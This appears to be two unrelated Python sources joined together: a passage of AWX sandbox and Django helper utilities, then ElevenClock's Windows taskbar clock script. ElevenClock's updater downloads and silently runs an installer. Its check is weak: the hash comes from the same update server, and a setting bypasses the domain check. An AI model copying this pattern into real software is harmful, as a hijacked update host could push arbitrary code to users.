hide_paths = [settings.AWX_PROOT_BASE_PATH]
if not kwargs.get('isolated'):
hide_paths.extend(['/etc/tower', '/var/lib/awx', '/var/log', '/etc/ssh',
settings.PROJECTS_ROOT, settings.JOBOUTPUT_ROOT])
hide_paths.extend(getattr(settings, 'AWX_PROOT_HIDE_PATHS', None) or [])
for path in sorted(set(hide_paths)):
if not os.path.exists(path):
continue
path = os.path.realpath(path)
if os.path.isdir(path):
new_path = tempfile.mkdtemp(dir=kwargs['proot_temp_dir'])
os.chmod(new_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
else:
handle, new_path = tempfile.mkstemp(dir=kwargs['proot_temp_dir'])
os.close(handle)
os.chmod(new_path, stat.S_IRUSR | stat.S_IWUSR)
new_args.extend(['--bind', '%s' %(new_path,), '%s' % (path,)])
if kwargs.get('isolated'):
show_paths = [kwargs['private_data_dir']]
elif 'private_data_dir' in kwargs:
show_paths = [cwd, kwargs['private_data_dir']]
else:
show_paths = [cwd]
for venv in (
settings.ANSIBLE_VENV_PATH,
settings.AWX_VENV_PATH,
kwargs.get('proot_custom_virtualenv')
):
if venv:
new_args.extend(['--ro-bind', venv, venv])
show_paths.extend(getattr(settings, 'AWX_PROOT_SHOW_PATHS', None) or [])
show_paths.extend(kwargs.get('proot_show_paths', []))
for path in sorted(set(show_paths)):
if not os.path.exists(path):
continue
path = os.path.realpath(path)
new_args.extend(['--bind', '%s' % (path,), '%s' % (path,)])
if kwargs.get('isolated'):
if '/bin/ansible-playbook' in ' '.join(args):
# playbook runs should cwd to the SCM checkout dir
new_args.extend(['--chdir', os.path.join(kwargs['private_data_dir'], 'project')])
else:
# ad-hoc runs should cwd to the root of the private data dir
new_args.extend(['--chdir', kwargs['private_data_dir']])
else:
new_args.extend(['--chdir', cwd])
new_args.extend(args)
return new_args
def get_pk_from_dict(_dict, key):
'''
Helper for obtaining a pk from user data dict or None if not present.
'''
try:
val = _dict[key]
if isinstance(val, object) and hasattr(val, 'id'):
return val.id # return id if given model object
return int(val)
except (TypeError, KeyError, ValueError):
return None
class NoDefaultProvided(object):
pass
def getattrd(obj, name, default=NoDefaultProvided):
"""
Same as getattr(), but allows dot notation lookup
Discussed in:
http://stackoverflow.com/questions/11975781
"""
try:
return reduce(getattr, name.split("."), obj)
except AttributeError:
if default != NoDefaultProvided:
return default
raise
def getattr_dne(obj, name, notfound=ObjectDoesNotExist):
try:
return getattr(obj, name)
except notfound:
return None
current_apps = apps
def set_current_apps(apps):
global current_apps
current_apps = apps
def get_current_apps():
global current_apps
return current_apps
def get_custom_venv_choices(custom_paths=None):
from django.conf import settings
custom_paths = custom_paths or settings.CUSTOM_VENV_PATHS
all_venv_paths = [settings.BASE_VENV_PATH] + custom_paths
custom_venv_choices = []
for custom_venv_path in all_venv_paths:
try:
if os.path.exists(custom_venv_path):
custom_venv_choices.extend([
os.path.join(custom_venv_path, x, '')
for x in os.listdir(custom_venv_path)
if x != 'awx' and
os.path.isdir(os.path.join(custom_venv_path, x)) and
os.path.exists(os.path.join(custom_venv_path, x, 'bin', 'activate'))
])
except Exception:
logger.exception("Encountered an error while discovering custom virtual environments.")
return custom_venv_choices
def is_ansible_variable(key):
return key.startswith('ansible_')
def extract_ansible_vars(extra_vars):
extra_vars = parse_yaml_or_json(extra_vars)
ansible_vars = set([])
for key in list(extra_vars.keys()):
if is_ansible_variable(key):
extra_vars.pop(key)
ansible_vars.add(key)
return (extra_vars, ansible_vars)
def get_search_fields(model):
fields = []
for field in model._meta.fields:
if field.name in ('username', 'first_name', 'last_name', 'email',
'name', 'description'):
fields.append(field.name)
return fields
def has_model_field_prefetched(model_obj, field_name):
# NOTE: Update this function if django internal implementation changes.
return getattr(getattr(model_obj, field_name, None),
'prefetch_cache_name', '') in getattr(model_obj, '_prefetched_objects_cache', {})
def get_external_account(user):
from django.conf import settings
account_type = None
if getattr(settings, 'AUTH_LDAP_SERVER_URI', None):
try:
if user.pk and user.profile.ldap_dn and not user.has_usable_password():
account_type = "ldap"
except AttributeError:
pass
if (getattr(settings, 'SOCIAL_AUTH_GOOGLE_OAUTH2_KEY', None) or
getattr(settings, 'SOCIAL_AUTH_GITHUB_KEY', None) or
getattr(settings, 'SOCIAL_AUTH_GITHUB_ORG_KEY', None) or
getattr(settings, 'SOCIAL_AUTH_GITHUB_TEAM_KEY', None) or
getattr(settings, 'SOCIAL_AUTH_SAML_ENABLED_IDPS', None)) and user.social_auth.all():
account_type = "social"
if (getattr(settings, 'RADIUS_SERVER', None) or
getattr(settings, 'TACACSPLUS_HOST', None)) and user.enterprise_auth.all():
account_type = "enterprise"
return account_type
class classproperty:
def __init__(self, fget=None, fset=None, fdel=None, doc=None):
self.fget = fget
self.fset = fset
self.fdel = fdel
if doc is None and fget is not None:
doc = fget.__doc__
self.__doc__ = doc
def __get__(self, instance, ownerclass):
return self.fget(ownerclass)
def create_temporary_fifo(data):
"""Open fifo named pipe in a new thread using a temporary file path. The
thread blocks until data is read from the pipe.
Returns the path to the fifo.
:param data(bytes): Data to write to the pipe.
"""
path = os.path.join(tempfile.mkdtemp(), next(tempfile._get_candidate_names()))
os.mkfifo(path, stat.S_IRUSR | stat.S_IWUSR)
threading.Thread(
target=lambda p, d: open(p, 'wb').write(d),
args=(path, data)
).start()
return path
def truncate_stdout(stdout, size):
from awx.main.constants import ANSI_SGR_PATTERN
if size <= 0 or len(stdout) <= size:
return stdout
stdout = stdout[:(size - 1)] + u'\u2026'
set_count, reset_count = 0, 0
for m in ANSI_SGR_PATTERN.finditer(stdout):
if m.group() == u'\u001b[0m':
reset_count += 1
else:
set_count += 1
return stdout + u'\u001b[0m' * (set_count - reset_count)
|
__init__.py
|
import os
import io
import sys
import time
import glob
import socket
import winreg
import locale
import hashlib
import platform
import tempfile
import datetime
import threading
import subprocess
from ctypes import windll
from urllib.request import urlopen
import psutil
import win32gui
import pythoncom
import win32process
import win32com.client
from PySide2.QtGui import *
from PySide2.QtCore import *
from PySide2.QtWidgets import *
from pynput.keyboard import Controller, Key
from pynput.mouse import Controller as MouseController
from lang import lang_de, lang_fr, lang_ca, lang_es, lang_ru, lang_en, lang_tr, lang_pl, lang_it, lang_nl, lang_nb, lang_ko, lang_vi, lang_el, lang_zh_TW, lang_pt
old_stdout = sys.stdout # Memorize the default stdout stream
sys.stdout = buffer = io.StringIO()
version = 2.5
appsWhereElevenClockShouldClose = ["msrdc.exe", "mstsc.exe", "CDViewer.exe", "wfica32.exe"]
print("---------------------------------------------------------------------------------------------------")
print("")
print(f" ElevenClock's v{version} log: Select all the text and hit Ctrl+C to copy it")
print("")
print("---------------------------------------------------------------------------------------------------")
print("")
print("")
print("")
print("")
def _(s): #Translate function
global lang
try:
t = lang.lang[s]
return t if t else s
except KeyError:
return s
def getPath(s):
return os.path.join(realpath, s).replace("\\", "/")
def getMousePos():
return QPoint(mController.position[0], mController.position[1])
def readRegedit(aKey, sKey, default, storage=winreg.HKEY_CURRENT_USER):
registry = winreg.ConnectRegistry(None, storage)
reg_keypath = aKey
try:
reg_key = winreg.OpenKey(registry, reg_keypath)
except FileNotFoundError as e:
print(e)
return default
for i in range(1024):
try:
value_name, value, _ = winreg.EnumValue(reg_key, i)
if value_name == sKey:
return value
except OSError as e:
print(e)
return default
def checkRDP():
def checkIfElevenClockRunning(processess, blacklistedProcess) -> bool:
for p in processess:
for procName in blacklistedProcess:
if procName == p :
return True
return False
global isRDPRunning
print("start RDP thread")
while True:
pythoncom.CoInitialize()
_wmi = win32com.client.GetObject('winmgmts:')
processes = _wmi.ExecQuery('Select Name from win32_process')
procs = []
for p in processes:
procs.append(p.Name)
isRDPRunning = checkIfElevenClockRunning(procs, appsWhereElevenClockShouldClose)
time.sleep(5)
def getSettings(s: str):
try:
return os.path.exists(os.path.join(os.path.join(os.path.expanduser("~"), ".elevenclock"), s))
except Exception as e:
print(e)
def setSettings(s: str, v: bool, r: bool = True):
try:
if(v):
open(os.path.join(os.path.join(os.path.expanduser("~"), ".elevenclock"), s), "w").close()
else:
try:
os.remove(os.path.join(os.path.join(os.path.expanduser("~"), ".elevenclock"), s))
except FileNotFoundError:
pass
loadTimeFormat()
if(r):
restartClocks()
if(getSettings("DisableSystemTray")):
i.hide()
else:
i.show()
except Exception as e:
print(e)
def getSettingsValue(s: str):
try:
with open(os.path.join(os.path.join(os.path.expanduser("~"), ".elevenclock"), s), "r") as sf:
return sf.read()
except Exception as e:
print(e)
return ""
def setSettingsValue(s: str, v: str, r: bool = True):
try:
with open(os.path.join(os.path.join(os.path.expanduser("~"), ".elevenclock"), s), "w") as sf:
sf.write(v)
loadTimeFormat()
if(r):
restartClocks()
except Exception as e:
print(e)
def updateChecker():
while True:
updateIfPossible()
time.sleep(7200)
def updateIfPossible(force = False):
try:
if(not(getSettings("DisableAutoCheckForUpdates")) or force):
print("Starting update check")
integrityPass = False
dmname = socket.gethostbyname_ex("versions.somepythonthings.tk")[0]
if(dmname == "769432b9-3560-4f94-8f90-01c95844d994.id.repl.co" or getSettings("BypassDomainAuthCheck")): # Check provider IP to prevent exploits
integrityPass = True
response = urlopen("https://versions.somepythonthings.tk/versions/elevenclock.ver")
response = response.read().decode("utf8")
if float(response.split("///")[0]) > version:
print("Updates found!")
if(not(getSettings("DisableAutoInstallUpdates")) or force):
if(integrityPass):
url = "https://github.com/martinet101/ElevenClock/releases/latest/download/ElevenClock.Installer.exe"
print(url)
filedata = urlopen(url)
datatowrite = filedata.read()
filename = ""
with open(os.path.join(tempDir, "SomePythonThings-ElevenClock-Updater.exe"), 'wb') as f:
f.write(datatowrite)
filename = f.name
print(filename)
print(dmname)
if(hashlib.sha256(datatowrite).hexdigest().lower() == response.split("///")[2].replace("\n", "").lower()):
print("Hash: ", response.split("///")[2].replace("\n", "").lower())
print("Hash ok, starting update")
if(getSettings("EnableSilentUpdates") and not(force)):
subprocess.run('start /B "" "{0}" /verysilent'.format(filename), shell=True)
else:
subprocess.run('start /B "" "{0}" /silent'.format(filename), shell=True)
else:
print("Hash not ok")
print("File hash: ", hashlib.sha256(datatowrite).hexdigest())
print("Provided hash: ", response.split("///")[2].replace("\n", "").lower())
else:
showWarn.infoSignal.emit("Updates found!", f"ElevenClock Version {response.split('///')[0]} is available, but ElevenClock can't verify the autenticity of the package. Please go ElevenClock's homepage and download the latest version from there.\n\nDo you want to open the download page?")
else:
showNotif.infoSignal.emit("Updates found!", f"ElevenClock Version {response.split('///')[0]} is available. Go to ElevenClock's Settings to update")
else:
print("updates not found")
else:
print("update checking disabled")
except Exception as e:
print(f"Exception: {e}")
restartCount = 0
def resetRestartCount():
global restartCount
while True:
if(restartCount>0):
print("Restart loop:", restartCount)
restartCount -= 1
time.sleep(0.3)
threading.Thread(target=resetRestartCount, daemon=True).start()
def loadClocks():
global clocks, oldScreens, st, restartCount, st
try:
st.kill()
except AttributeError:
pass
firstWinSkipped = getSettings("ForceClockOnFirstMonitor")
oldScreens = []
clocks = []
process = psutil.Process(os.getpid())
print(process.memory_info().rss/1048576)
if restartCount<20 and (process.memory_info().rss/1048576) <= 150:
restartCount += 1
for screen in app.screens():
oldScreens.append(getGeometry(screen))
print(screen, screen.geometry(), getGeometry(screen))
old_stdout.write(buffer.getvalue())
old_stdout.flush()
screen: QScreen
if(firstWinSkipped):
clocks.append(Clock(screen.logicalDotsPerInchX()/96, screen.logicalDotsPerInchY()/96, screen))
else: # Skip the primary display, as it has already the clock
print("This is primay screen and is set to be skipped")
firstWinSkipped = True
st = KillableThread(target=screenCheckThread, daemon=True)
st.start()
else:
os.startfile(sys.executable)
print("overloading system, killing!")
app.quit()
sys.exit(1)
def getGeometry(screen: QScreen):
return (screen.geometry().width(), screen.geometry().height(), screen.geometry().x(), screen.geometry().y(), screen.logicalDotsPerInchX(), screen.logicalDotsPerInchY())
def theyMatch(oldscreens, newscreens):
if(len(oldscreens) != len(newscreens)):
return False # If there are display changes
for i in range(len(oldscreens)):
old, new = oldscreens[i], newscreens[i]
if(old != getGeometry(new)): # Check if screen dimensions or dpi have changed
return False # They have changed (screens are not equal)
return True # they have not changed (screens still the same)
def screenCheckThread():
print("screenCheckThread")
while theyMatch(oldScreens, app.screens()):
time.sleep(1)
print(app.screens(), oldScreens)
signal.restartSignal.emit()
pass
def closeClocks():
for clock in clocks:
clock.hide()
clock.close()
def showMessage(a, b):
lastState = i.isVisible()
i.show()
i.showMessage(a, b)
sw.updateButton.show()
sw.resizewidget.setMinimumHeight(sw.resizewidget.sizeHint().height())
i.setVisible(lastState)
def restartClocks(caller: str = ""):
print(caller)
global clocks, st, rdpThread, timethread
for clock in clocks:
clock.hide()
clock.close()
loadClocks()
loadTimeFormat()
try:
rdpThread.kill()
timethread.kill()
except AttributeError:
pass
rdpThread = KillableThread(target=checkRDP, daemon=True)
if(getSettings("EnableHideOnRDP")):
rdpThread.start()
timethread = KillableThread(target=timeStrThread, daemon=True)
timethread.start()
def isElevenClockRunning():
nowTime = time.time()
name = f"ElevenClockRunning{nowTime}"
setSettings(name, True, False)
while True:
try:
for file in glob.glob(os.path.join(os.path.join(os.path.expanduser("~"), ".elevenclock"), "ElevenClockRunning*")):
if(os.path.join(os.path.join(os.path.expanduser("~"), ".elevenclock"), name) == file):
pass
else:
if(float(file.replace(os.path.join(os.path.join(os.path.expanduser("~"), ".elevenclock"), "ElevenClockRunning"), "")) < nowTime): # If lockfile is older
os.remove(file)
if not(getSettings(name)):
print("KILLING, NEWER VERSION RUNNING")
killSignal.infoSignal.emit("", "")
except Exception as e:
print(e)
time.sleep(2)
def wanrUserAboutUpdates(a, b):
if(QMessageBox.question(sw, a, b, QMessageBox.Open | QMessageBox.Cancel, QMessageBox.Open) == QMessageBox.Open):
os.startfile("https://github.com/martinet101/ElevenClock/releases/latest")
def checkIfWokeUp():
while True:
lastTime = time.time()
time.sleep(3)
if((lastTime+6) < time.time()):
os.startfile(sys.executable)
def loadTimeFormat():
global dateTimeFormat
showSeconds = readRegedit(r"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "ShowSecondsInSystemClock", 0) or getSettings("EnableSeconds")
locale.setlocale(locale.LC_ALL, readRegedit(r"Control Panel\International", "LocaleName", "en_US"))
dateTimeFormat = "%HH:%M\n%A\n%d/%m/%Y"
if getSettings("DisableTime"):
dateTimeFormat = dateTimeFormat.replace("%HH:%M\n", "")
if getSettings("DisableDate"):
if("\n" in dateTimeFormat):
dateTimeFormat = dateTimeFormat.replace("\n%d/%m/%Y", "")
else:
dateTimeFormat = dateTimeFormat.replace("%d/%m/%Y", "")
if not getSettings("EnableWeekDay"):
dateTimeFormat = dateTimeFormat.replace("%A", "").replace("\n\n", "\n")
if dateTimeFormat[-1] == "\n":
dateTimeFormat = dateTimeFormat[0:-1]
if dateTimeFormat[0] == "\n":
dateTimeFormat = dateTimeFormat[1:]
dateMode = readRegedit(r"Control Panel\International", "sShortDate", "dd/MM/yyyy")
dateMode = dateMode.replace("ddd", "%a").replace("dd", "%$").replace("d", "%#d").replace("$", "d").replace("MMMM", "%B").replace("MMM", "%b").replace("MM", "%m").replace("M", "%#m").replace("yyyy", "%Y").replace("yy", "%y")
timeMode = readRegedit(r"Control Panel\International", "sShortTime", "H:mm")
timeMode = timeMode.replace("Uhr", "~").replace("HH", "%$").replace("H", "%#H").replace("$", "H").replace("hh", "%I").replace("h", "%#I").replace("mm", "%M").replace("m", "%#M").replace("tt", "%p").replace("t", "%p").replace("ss", "%S").replace("s", "%#S")
if not("S" in timeMode) and showSeconds==1:
for separator in ":.-/_":
if(separator in timeMode):
timeMode += f"{separator}%S"
for separator in ":.-/_":
timeMode = timeMode.replace(f" %p{separator}%S", f"{separator}%S %p")
timeMode = timeMode.replace(f" %p{separator}%#S", f"{separator}%#S %p")
dateTimeFormat = dateTimeFormat.replace("%d/%m/%Y", dateMode).replace("%HH:%M", timeMode)
def timeStrThread():
global timeStr, dateTimeFormat
fixHyphen = getSettings("EnableHyphenFix")
while True:
if(fixHyphen):
for _ in range(36000):
timeStr = datetime.datetime.now().strftime(dateTimeFormat).replace("~", "Uhr").replace("'", "").replace("t-", "t -")
time.sleep(0.1)
else:
for _ in range(36000):
timeStr = datetime.datetime.now().strftime(dateTimeFormat).replace("~", "Uhr").replace("'", "")
time.sleep(0.1)
class KillableThread(threading.Thread):
def __init__(self, *args, **keywords):
threading.Thread.__init__(self, *args, **keywords)
self.shouldBeRuning = True
def start(self):
self._run = self.run
self.run = self.settrace_and_run
threading.Thread.start(self)
def settrace_and_run(self):
sys.settrace(self.globaltrace)
self._run()
def globaltrace(self, frame, event, arg):
return self.localtrace if event == 'call' else None
def localtrace(self, frame, event, arg):
if not(self.shouldBeRuning) and event == 'line':
raise SystemExit()
return self.localtrace
def kill(self):
self.shouldBeRuning = False
class RestartSignal(QObject):
restartSignal = Signal()
def __init__(self) -> None:
super().__init__()
class InfoSignal(QObject):
infoSignal = Signal(str, str)
def __init__(self) -> None:
super().__init__()
class Clock(QWidget):
refresh = Signal()
hideSignal = Signal()
callInMainSignal = Signal(object)
def __init__(self, dpix, dpiy, screen):
super().__init__()
self.lastTheme = 0
self.callInMainSignal.connect(lambda f: f())
self.preferedwidth = 150
self.preferedHeight = 48
try:
if readRegedit(r"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "TaskbarSi", 1) == 0 or (not getSettings("DisableTime") and not getSettings("DisableDate") and getSettings("EnableWeekDay")):
self.setStyleSheet(f"background-color: rgba(0, 0, 0, 0.01);margin: 5px;margin-top: 2px;margin-bottom: 2px; border-radius: 5px;")
if not(not getSettings("DisableTime") and not getSettings("DisableDate") and getSettings("EnableWeekDay")):
print("Small taskbar")
self.preferedHeight = 32
self.preferedwidth = 200
else:
self.setStyleSheet(f"background-color: rgba(0, 0, 0, 0.01);margin: 5px;border-radius: 5px;")
except Exception as e:
print(e)
self.setStyleSheet(f"background-color: rgba(0, 0, 0, 0.01);margin: 5px;border-radius: 5px;")
self.screen: QScreen = screen
self.shouldBeVisible = True
self.refresh.connect(self.refreshandShow)
self.hideSignal.connect(self.hide)
self.keyboard = Controller()
self.setWindowFlag(Qt.WindowStaysOnTopHint)
self.setWindowFlag(Qt.FramelessWindowHint)
self.setAttribute(Qt.WA_TranslucentBackground)
self.setWindowFlag(Qt.Tool)
self.autoHide = readRegedit(r"Software\Microsoft\Windows\CurrentVersion\Explorer\StuckRects3", "Settings", b'0\x00\x00\x00\xfe\xff\xff\xffz\xf4\x00\x00\x03\x00\x00\x00T\x00\x00\x000\x00\x00\x00\x00\x00\x00\x00\x08\x04\x00\x00\x80\x07\x00\x008\x04\x00\x00`\x00\x00\x00\x01\x00\x00\x00')[8]==123
self.setToolTip(f"ElevenClock version {version}\n\nClick once to show notifications")
try:
if(readRegedit(r"Software\Microsoft\Windows\CurrentVersion\Explorer\StuckRects3", "Settings", b'0\x00\x00\x00\xfe\xff\xff\xffz\xf4\x00\x00\x03\x00\x00\x00T\x00\x00\x000\x00\x00\x00\x00\x00\x00\x00\x08\x04\x00\x00\x80\x07\x00\x008\x04\x00\x00`\x00\x00\x00\x01\x00\x00\x00')[12] == 1 and not(getSettings("ForceOnBottom"))):
h = self.screen.geometry().y()
print("taskbar at top")
else:
h = self.screen.geometry().y()+self.screen.geometry().height()-(self.preferedHeight*dpiy)
print("taskbar at bottom")
except:
h = self.screen.geometry().y()+self.screen.geometry().height()-(self.preferedHeight*dpiy)
print("taskbar at bottom")
self.label = Label(timeStr, self)
if(getSettings("ClockOnTheLeft")):
w = self.screen.geometry().x()+8*dpix
self.label.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)
else:
self.label.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
w = self.screen.geometry().x()+self.screen.geometry().width()-((self.preferedwidth+8)*dpix)
self.w = w
self.h = h
self.dpix = dpix
self.dpiy = dpiy
if not(getSettings("EnableWin32API")):
print("Using qt's default positioning system")
self.move(w, h)
self.resize(self.preferedwidth*dpix, self.preferedHeight*dpiy)
else:
print("Using win32 API positioning system")
self.user32 = windll.user32
self.user32.SetProcessDPIAware() # optional, makes functions return real pixel numbers instead of scaled values
win32gui.SetWindowPos(self.winId(), 0, int(w), int(h), int(self.preferedwidth*dpix), int(self.preferedHeight*dpiy), False)
print("Clock geometry:", self.geometry())
self.font: QFont = QFont()
if lang == lang_ko:
self.font.setFamilies(["Malgun Gothic", "Segoe UI Variable", "sans-serif"])
elif lang == lang_zh_TW:
self.font.setFamilies(["Microsoft JhengHei UI", "Segoe UI Variable", "sans-serif"])
else:
self.font.setFamilies(["Segoe UI Variable", "sans-serif"])
self.font.setPointSizeF(9)
self.font.setStyleStrategy(QFont.PreferOutline)
self.font.setLetterSpacing(QFont.PercentageSpacing, 100)
self.font.setHintingPreference(QFont.HintingPreference.PreferNoHinting)
self.label.setFont(self.font)
if (readRegedit(r"Software\Microsoft\Windows\CurrentVersion\Themes\Personalize", "SystemUsesLightTheme", 1) == 0 or getSettings("ForceDarkTheme")) and not getSettings("ForceLightTheme"):
self.lastTheme = 0
self.label.setStyleSheet("padding: 1px;padding-right: 5px; color: white;")
self.label.bgopacity = .1
if lang == lang_ko:
self.font.setWeight(QFont.Weight.Normal)
elif lang == lang_zh_TW:
self.font.setWeight(QFont.Weight.Normal)
else:
self.font.setWeight(QFont.Weight.Medium)
self.label.setFont(self.font)
else:
self.lastTheme = 1
self.label.setStyleSheet("padding: 1px;padding-right: 5px; color: black;")
self.label.bgopacity = .5
self.font.setWeight(QFont.Weight.Normal)
self.label.setFont(self.font)
self.label.clicked.connect(lambda: self.showCalendar())
self.label.move(0, 0)
self.label.setFixedHeight(self.height())
self.label.setFixedWidth(self.width())
self.label.show()
self.show()
self.raise_()
self.setFocus()
self.isRDPRunning = True
self.full_screen_rect = (self.screen.geometry().x(), self.screen.geometry().y(), self.screen.geometry().x()+self.screen.geometry().width(), self.screen.geometry().y()+self.screen.geometry().height())
print("Full screen rect: ", self.full_screen_rect)
self.user32 = windll.user32
self.user32.SetProcessDPIAware() # optional, makes functions return real pixel numbers instead of scaled values
self.loop = KillableThread(target=self.fivesecsloop, daemon=True)
self.loop2 = KillableThread(target=self.refreshProcesses, daemon=True)
self.loop.start()
self.loop2.start()
def refreshProcesses(self):
global isRDPRunning
#time.sleep(2)
#self.callInMainSignal.emit(self.setToTheMiddle)
while True:
self.isRDPRunning = isRDPRunning
time.sleep(1)
def theresFullScreenWin(self, clockOnFirstMon):
try:
fullscreen = False
def absoluteValuesAreEqual(a, b):
try:
return (a[0]) == (b[0]) and (a[1]) == (b[1]) and (a[2]) == (b[2]) and (a[3]) == (b[3])
except Exception as e:
print(e)
def winEnumHandler( hwnd, ctx ):
nonlocal fullscreen
if win32gui.IsWindowVisible( hwnd ):
if(absoluteValuesAreEqual(win32gui.GetWindowRect(hwnd), self.full_screen_rect)):
if(clockOnFirstMon):
pythoncom.CoInitialize()
_, pid = win32process.GetWindowThreadProcessId(hwnd)
_wmi = win32com.client.GetObject('winmgmts:')
# collect all the running processes
processes = _wmi.ExecQuery(f'Select Name from win32_process where ProcessId = {pid}')
for p in processes:
if(p.Name != "TextInputHost.exe"):
if(win32gui.GetWindowText(hwnd) != ""):
print(hwnd, win32gui.GetWindowText(hwnd), self.full_screen_rect, win32gui.GetWindowRect(hwnd))
fullscreen = True
else:
if(win32gui.GetWindowText(hwnd) != ""):
print(hwnd, win32gui.GetWindowText(hwnd), self.full_screen_rect, win32gui.GetWindowRect(hwnd))
fullscreen = True
win32gui.EnumWindows(winEnumHandler, 0)
return fullscreen
except Exception as e:
raise e
return False
def fivesecsloop(self):
EnableHideOnFullScreen = getSettings("EnableHideOnFullScreen")
DisableHideWithTaskbar = getSettings("DisableHideWithTaskbar")
EnableHideOnRDP = getSettings("EnableHideOnRDP")
clockOnFirstMon = getSettings("ForceClockOnFirstMonitor")
if clockOnFirstMon:
INTLOOPTIME = 15
else:
INTLOOPTIME = 2
while True:
isFullScreen = self.theresFullScreenWin(clockOnFirstMon)
for i in range(INTLOOPTIME):
if not(isFullScreen) or not(EnableHideOnFullScreen):
if self.autoHide and not(DisableHideWithTaskbar):
mousePos = getMousePos()
if (mousePos.y()+1 == self.screen.geometry().y()+self.screen.geometry().height()) and self.screen.geometry().x() < mousePos.x() and self.screen.geometry().x()+self.screen.geometry().width() > mousePos.x():
self.refresh.emit()
elif (mousePos.y() <= self.screen.geometry().y()+self.screen.geometry().height()-self.preferedHeight):
self.hideSignal.emit()
else:
if(self.isRDPRunning and EnableHideOnRDP):
self.hideSignal.emit()
else:
self.refresh.emit()
else:
self.hideSignal.emit()
time.sleep(0.1)
def showCalendar(self):
self.keyboard.press(Key.cmd)
self.keyboard.press('n')
self.keyboard.release('n')
self.keyboard.release(Key.cmd)
def focusOutEvent(self, event: QFocusEvent) -> None:
self.refresh.emit()
def refreshandShow(self):
if(self.shouldBeVisible):
self.show()
self.setVisible(True)
self.raise_()
theme = readRegedit(r"Software\Microsoft\Windows\CurrentVersion\Themes\Personalize", "SystemUsesLightTheme", 1)
if(theme != self.lastTheme):
if (theme == 0 or getSettings("ForceDarkTheme")) and not getSettings("ForceLightTheme"):
self.lastTheme = 0
self.label.setStyleSheet("padding: 1px;padding-right: 5px; color: white;")
self.label.bgopacity = 0.1
self.font.setWeight(QFont.Weight.Medium)
self.label.setFont(self.font)
else:
self.lastTheme = 1
self.label.setStyleSheet("padding: 1px;padding-right: 5px; color: black;")
self.label.bgopacity = .5
self.font.setWeight(QFont.Weight.Normal)
self.label.setFont(self.font)
self.label.setText(timeStr)
def closeEvent(self, event: QCloseEvent) -> None:
self.shouldBeVisible = False
print("close")
self.loop.kill()
self.loop2.kill()
event.accept()
return super().closeEvent(event)
def setToTheMiddle(self) -> None:
if getSettings("CenterAlignment"):
self.label.setAlignment(Qt.AlignHCenter | Qt.AlignVCenter)
self.setFixedWidth(self.label.getTextUsedSpaceRect()+5)
if not(getSettings("EnableWin32API")):
print("Using qt's default positioning system")
self.move((self.preferedwidth-(self.label.getTextUsedSpaceRect()+5))+self.w, self.h)
self.resize(self.label.getTextUsedSpaceRect()+5, self.preferedHeight*self.dpiy)
else:
print("Using win32 API positioning system")
self.user32 = windll.user32
self.user32.SetProcessDPIAware() # optional, makes functions return real pixel numbers instead of scaled values
win32gui.SetWindowPos(self.winId(), 0, int((self.preferedwidth-self.label.getTextUsedSpaceRect()+5)+self.w), int(self.h), int(self.label.getTextUsedSpaceRect()+5), int(self.preferedHeight*self.dpiy), False)
print("Width hint:",self.label.getTextUsedSpaceRect()+5, self.pos())
old_stdout.write(buffer.getvalue())
old_stdout.flush()
class Label(QLabel):
clicked = Signal()
def __init__(self, text, parent):
super().__init__(text, parent=parent)
self.setMouseTracking(True)
self.backgroundwidget = QWidget(self)
self.color = "255, 255, 255"
self.bgopacity = 0.1
self.backgroundwidget.setStyleSheet(f"background-color: rgba({self.color}, 0);border-top: 1px solid rgba({self.color},0);")
self.backgroundwidget.show()
self.showBackground = QVariantAnimation()
self.showBackground.setStartValue(.001) # Not 0 to prevent white flashing on the border
self.showBackground.setEndValue(self.bgopacity)
self.showBackground.setDuration(100)
self.showBackground.setEasingCurve(QEasingCurve.InOutQuad) # Not strictly required, just for the aesthetics
self.showBackground.valueChanged.connect(lambda opacity: self.backgroundwidget.setStyleSheet(f"background-color: rgba({self.color}, {opacity/2});border-top: 1px solid rgba({self.color}, {opacity});"))
self.hideBackground = QVariantAnimation()
self.hideBackground.setStartValue(self.bgopacity)
self.hideBackground.setEndValue(.001) # Not 0 to prevent white flashing on the border
self.hideBackground.setDuration(100)
self.hideBackground.setEasingCurve(QEasingCurve.InOutQuad) # Not strictly required, just for the aesthetics
self.hideBackground.valueChanged.connect(lambda opacity: self.backgroundwidget.setStyleSheet(f"background-color: rgba({self.color}, {opacity/2});border-top: 1px solid rgba({self.color}, {opacity});"))
def enterEvent(self, event: QEvent) -> None:
geometry: QRect = self.getTextUsedSpaceRect()
self.showBackground.setStartValue(.001)
self.showBackground.setEndValue(self.bgopacity) # Not 0 to prevent white flashing on the border
if(self.width() > geometry):
if(not(getSettings("ClockOnTheLeft"))):
self.backgroundwidget.move(self.width()-geometry, 0)
else:
self.backgroundwidget.move(0, 0)
self.backgroundwidget.resize(geometry, self.height())
else:
print("Background widget is bigger than parent!")
self.backgroundwidget.move(0, 0)
self.backgroundwidget.resize(geometry, self.height())
self.showBackground.start()
return super().enterEvent(event)
def leaveEvent(self, event: QEvent) -> None:
self.hideBackground.setStartValue(self.bgopacity)
self.hideBackground.setEndValue(.001) # Not 0 to prevent white flashing on the border
self.hideBackground.start()
return super().leaveEvent(event)
def getTextUsedSpaceRect(self):
text = self.text().strip()
if len(text.split("\n"))>=3:
mult = 0.633333333333333333
elif len(text.split("\n"))==2:
mult = 1
else:
mult = 1.5
return self.fontMetrics().boundingRect(text).width()*mult
def mousePressEvent(self, ev: QMouseEvent) -> None:
self.setWindowOpacity(0.7)
self.window().setWindowOpacity(0.7)
return super().mousePressEvent(ev)
def mouseReleaseEvent(self, ev: QMouseEvent) -> None:
self.setWindowOpacity(1)
self.window().setWindowOpacity(1)
if(ev.button() == Qt.RightButton):
mousePos = getMousePos()
print(i.contextMenu().height())
if(i.contextMenu().height() != 480):
mousePos.setY(self.window().y()-i.contextMenu().height())
else:
mousePos.setY(self.window().y()-int(220*(i.contextMenu().screen().logicalDotsPerInchX()/96)))
i.execMenu(mousePos)
else:
self.clicked.emit()
return super().mouseReleaseEvent(ev)
class Menu(QMenu):
def __init__(self, title: str):
self.setAttribute(Qt.WA_StyledBackground)
super().__init__(title)
class TaskbarIconTray(QSystemTrayIcon):
def __init__(self, app=None):
super().__init__(app)
self.setIcon(QIcon(os.path.join(realpath, "icon.ico")))
self.show()
